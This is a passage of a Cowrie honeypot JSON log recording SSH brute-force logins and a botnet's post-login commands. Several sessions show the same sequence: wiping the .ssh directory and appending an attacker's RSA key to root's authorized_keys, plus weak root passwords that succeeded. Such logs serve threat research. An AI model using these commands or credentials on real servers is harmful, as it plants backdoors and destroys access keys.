2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:36.926419Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin#2023","message":"login attempt [root/Admin#2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:37.917541Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:38.413850Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:38.414692Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:50:38.415507Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:38.654797Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:50:39.268025Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.269269Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.509188Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.510092Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45074,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0da9fa652fe","protocol":"ssh","message":"New connection: 212.227.235.229:45074 (1.2.3.4:22) [session: a0da9fa652fe]","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.743235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.744154Z","src_ip":"212.227.235.229","session":"a0da9fa652fe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:39.979161Z","src_ip":"212.227.235.229","session":"a0da9fa652fe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:50:40.963947Z","src_ip":"212.227.235.229","session":"a0da9fa652fe"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:42.201277Z","src_ip":"212.227.235.229","session":"a0da9fa652fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45088,"dst_ip":"1.2.3.4","dst_port":22,"session":"fce5381f04c0","protocol":"ssh","message":"New connection: 212.227.235.229:45088 (1.2.3.4:22) [session: fce5381f04c0]","sensor":"my-vps","timestamp":"2025-08-26T00:50:42.458647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:50:42.459320Z","src_ip":"212.227.235.229","session":"fce5381f04c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:50:42.706571Z","src_ip":"212.227.235.229","session":"fce5381f04c0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:43.734981Z","src_ip":"212.227.235.229","session":"fce5381f04c0"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:43.973898Z","src_ip":"212.227.235.229","session":"b46e0e392f77"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:43.983774Z","src_ip":"212.227.235.229","session":"fce5381f04c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38708,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef17af2fb9c7","protocol":"ssh","message":"New connection: 212.227.235.229:38708 (1.2.3.4:22) [session: ef17af2fb9c7]","sensor":"my-vps","timestamp":"2025-08-26T00:50:48.226139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:50:48.803661Z","src_ip":"212.227.235.229","session":"ef17af2fb9c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:50:48.804776Z","src_ip":"212.227.235.229","session":"ef17af2fb9c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Lvbnhbq27","message":"login attempt [root/Lvbnhbq27] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:50:52.420315Z","src_ip":"212.227.235.229","session":"ef17af2fb9c7"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:50:53.163150Z","src_ip":"212.227.235.229","session":"ef17af2fb9c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3541,"dst_ip":"1.2.3.4","dst_port":23,"session":"4054ecf2caf4","protocol":"telnet","message":"New connection: 212.227.125.160:3541 (1.2.3.4:23) [session: 4054ecf2caf4]","sensor":"my-vps","timestamp":"2025-08-26T00:51:10.856685Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":58420,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c8c77e30775","protocol":"ssh","message":"New connection: 27.112.78.170:58420 (1.2.3.4:22) [session: 4c8c77e30775]","sensor":"my-vps","timestamp":"2025-08-26T00:51:11.733186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:11.733958Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:12.003968Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49428,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f2bcb3841cc","protocol":"ssh","message":"New connection: 36.89.28.139:49428 (1.2.3.4:22) [session: 1f2bcb3841cc]","sensor":"my-vps","timestamp":"2025-08-26T00:51:12.917628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:12.918792Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.101191Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.login.success","username":"root","password":"zaq12wsX","message":"login attempt [root/zaq12wsX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.129357Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:13.686785Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.687516Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.689059Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.login.success","username":"root","password":"moon","message":"login attempt [root/moon] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.872686Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:13.958897Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:14.303419Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.304127Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.305037Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.504610Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:14.655756Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.656449Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:51:14.899006Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.899722Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.929547Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:14.930369Z","src_ip":"27.112.78.170","session":"4c8c77e30775"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.083614Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.084551Z","src_ip":"36.89.28.139","session":"1f2bcb3841cc"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":58434,"dst_ip":"1.2.3.4","dst_port":22,"session":"2657057ec537","protocol":"ssh","message":"New connection: 27.112.78.170:58434 (1.2.3.4:22) [session: 2657057ec537]","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.196941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:15.198035Z","src_ip":"27.112.78.170","session":"2657057ec537"}
